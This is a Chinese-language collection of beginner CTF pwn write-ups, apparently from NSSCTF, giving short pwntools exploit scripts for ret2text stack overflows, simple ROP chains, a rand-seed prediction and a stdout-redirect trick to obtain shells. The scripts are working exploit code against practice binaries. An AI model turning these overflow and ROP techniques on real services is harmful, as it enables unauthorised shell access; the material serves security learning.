PWN入门-ret2text做题

[SWPUCTF 2021 新生赛]gift_pwn

1
checksec 文件名

  • 开启堆栈不可执行保护(NX),不会把堆栈上数据当成指令来执行。

  • 没有canary保护,可利用栈溢出来修改eip。

  • PIE地址随机花没有开启。

1
2
3
4
5
from pwn import *
p=remote('node4.anna.nssctf.cn',28708)
payload=b'a'*0x10+b'a'*8+p64(0x4005B6) #32位+4 64位+8
p.sendline(payload)
p.interactive()

[CISCN 2019华北]PWN1

1
2
3
4
5
6
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./attachment')
payload=b'a'*0x2c+p64(0x41348000)
p.sendline(payload)
p.interactive()

[BJDCTF 2020]babystack2.0

1
2
3
4
5
6
7
8
9
10
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=remote('node4.anna.nssctf.cn',28830)
p.recvuntil("[+]Please input the length of your name:")
p.sendline(b'-1')
p.recvuntil("[+]What's u name?")
bin_sh=p64(0x400726)
payload=flat([b'a'*0x10,b'a'*8,bin_sh])
p.sendline(payload)
p.interactive()

[BJDCTF 2020]babystack

1
2
3
4
5
6
7
8
9
10
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=remote('node4.anna.nssctf.cn',28487)
p.recvuntil("[+]Please input the length of your name:")
p.sendline(b'999')
p.recvuntil("[+]What's u name?")
bin_sh=p64(0x4006E6)
payload=flat([b'a'*0x10,b'a'*8,bin_sh])
p.sendline(payload)
p.interactive()

[NISACTF 2022]ezstack

1
2
3
4
5
6
7
8
9
from pwn import *
context(log_level='debug',arch='i386',os='linux')
p=remote('node5.anna.nssctf.cn',28073)
p.recvuntil("Welcome to NISACTF")
system_addr=p32(0x8048512)
bin_sh_addr=p32(0x804a024)
payload=flat([b'a'*0x48,b'a'*4,system_addr,bin_sh_addr])
p.sendline(payload)
p.interactive()

[watevrCTF 2019]Voting Machine 1

1
2
3
4
5
6
7
8
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=remote('node5.anna.nssctf.cn',28446)
p.recvuntil('Vote: ')
backdoor_addr=p64(0x400807)
payload=flat([b'a'*0x2,b'a'*8,backdoor_addr])
p.sendline(payload)
p.interactive()

[GFCTF 2021]where_is_shell

“/bin/sh”等同于“sh”等同于“$0”,“$0”为0x2430,正好tips函数中有个花指令可以利用。

构造rop链:

栈对齐随便打一个ret:

1
ROPgadget --binary shell --only "ret"

system由rdi传参,找pop_rdi_ret型gadget:

1
ROPgadget --binary shell --only "pop|ret"

将$0地址压栈,再从plt劫持system地址打。

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
import struct
context(log_level='debug',arch='amd64',os='linux')
elf=ELF('./shell')
p=remote("node4.anna.nssctf.cn",28367)
p.recvuntil("zltt lost his shell, can you find it?")
ret_addr=p64(0x400416)
pop_rdi_ret_addr=p64(0x4005e3)
bin_sh_addr=p64(0x400541)
system_addr=p64(elf.plt["system"])
payload=flat([b'a'*0x10,b'a'*8,ret_addr,pop_rdi_ret_addr,bin_sh_addr,system_addr])
p.sendline(payload)
p.interactive()

[HNCTF 2022 Week1]easyoverflow

略。

[NSSCTF 2022 Spring Recruit]R3m4ke?

1
2
3
4
5
6
7
8
9
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote('node4.anna.nssctf.cn',28510)
stack_overflow=cyclic(0x20+8)
shell_addr=p64(0x40072C)
payload1=flat([stack_overflow,shell_addr])
p.recvuntil("[+] Welcome to NSS , this is a very simple PWN question for getting started>")
p.sendline(payload1)
p.interactive()

[WUSTCTF 2020]getshell

1
2
3
4
5
6
7
8
9
from pwn import *
context(log_level='debug',os='linux',arch='i386')
p=remote("node5.anna.nssctf.cn",28644)
elf=ELF('./attachment')
stack_overflow=cyclic(0x18+4)
shell_addr=p32(elf.sym["shell"])
payload1=flat([stack_overflow,shell_addr])
p.sendline(payload1)
p.interactive()

[HNCTF 2022 Week1]ezr0p32

32位函数传参都在栈上,不牵扯寄存器。栈溢出后直接打system,内部先pop出call压入的ebp,所以先填充一个双字的垃圾,栈里第二个位置开始即为传参。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *
context(log_level='debug',os='linux',arch='i386')
elf=ELF('./attachment')
p=remote("node5.anna.nssctf.cn",28745)
p.recvuntil("please tell me your name")
payload1=b'/bin/sh'
p.sendline(payload1)
p.recvuntil("now it's your play time~")
stack_overflow=b'a'*(0x1c+4)
system_addr=p32(elf.sym["system"])
skip_ebp=b'aaaa'
buf_addr=p32(elf.sym["buf"])
payload2=flat([stack_overflow,system_addr,skip_ebp,buf_addr])
p.sendline(payload2)
p.interactive()

[SWPUCTF 2022 新生赛]有手就行的栈溢出

1
2
3
4
5
6
7
8
9
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
elf=ELF('./attachment')
p=remote("node5.anna.nssctf.cn",28415)
stack_overflow=b'a'*(0x20+8)
fun_addr=p64(elf.sym["fun"])
payload1=flat([stack_overflow,fun_addr])
p.sendline(payload1)
p.interactive()

[HDCTF 2023]pwnner

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
from ctypes import *
context(log_level='debug',arch='amd64',os='linux')
p=remote("node5.anna.nssctf.cn",28292)
elf=ELF('./attachment')
ctype=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
ctype.srand(0x39)
payload1=str(ctype.rand()).encode()
p.recvuntil("you should prove that you love pwn,so input your name:")
p.sendline(payload1)
stack_overflow=cyclic(0x40+0x8)
ret_addr=p64(0x40028b)
backdoor_addr=p64(elf.sym["get_shell"])
payload2=flat([stack_overflow,ret_addr,backdoor_addr])
p.recvuntil("ok,you have a little cognition about pwn,so what will you do next?")
p.sendline(payload2)
p.interactive()

[WUSTCTF 2020]getshell2

1
2
3
4
5
6
7
8
9
10
from pwn import *
context(log_level='debug',os='linux',arch='i386')
p=remote("node5.anna.nssctf.cn",28601)
stack_overflow=b'a'*(0x18+4)
call_system_addr=p32(0x08048529)
str_bin_sh_addr=p32(0x08048670)
payload1=flat([stack_overflow,call_system_addr,str_bin_sh_addr])
p.recvuntil("/_/  /_/\\_,_//_/ /_/ /_//_\\_\\ \n")
p.sendline(payload1)
p.interactive()

[HNCTF 2022 WEEK2]ez_backdoor

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote("node5.anna.nssctf.cn",28629)
elf=ELF("./attachment")
stack_overflow=b'a'*(0x100+8)
backdoor_addr=p64(elf.sym["backdoor"])
ret_addr=p64(0x40101a)
payload1=flat([stack_overflow,ret_addr,backdoor_addr])
p.recvuntil("It's a easy challenge")
p.sendline(payload1)
p.interactive()

[NUSTCTF 2022 新生赛]ezPwn

1
2
3
4
5
6
7
8
9
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote("node5.anna.nssctf.cn",28481)
p.recvuntil("Your name plz:\n")
stack_overflow=cyclic(0xa+8)
shell_addr=p64(0x401229)
payload1=flat([stack_overflow,shell_addr])
p.sendline(payload1)
p.interactive()

[HGAME 2023 week1]easy_overflow

这题用close(1)把标准输出给关了。

拿shell后用exec 1>&0把标准输出重定位到标准输入。

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p=remote('node5.anna.nssctf.cn',28424)
elf=ELF('./attachment')
rop=ROP(elf)
padding=cyclic(0x10+0x8)
ret_addr=p64(rop.find_gadget(['ret'])[0])
backdoor_addr=p64(elf.symbols['b4ckd0or'])
payload1=flat([padding,ret_addr,backdoor_addr])
p.sendline(payload1)
p.sendline(b'exec 1>&0')
p.interactive()

[MoeCTF 2022]ret2text

1
#代码丢失

[MoeCTF 2021]ret2text_ez

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote("node5.anna.nssctf.cn",28857)
elf=ELF("./pwn")
rop=ROP(elf)
stack_overflow=cyclic(0x20+0x8)
backdoor_addr=p64(elf.symbols["backdoor"])
ret_addr=p64(rop.find_gadget(["ret"])[0])
payload1=flat([stack_overflow,ret_addr,backdoor_addr])
p.sendline(payload1)
p.interactive()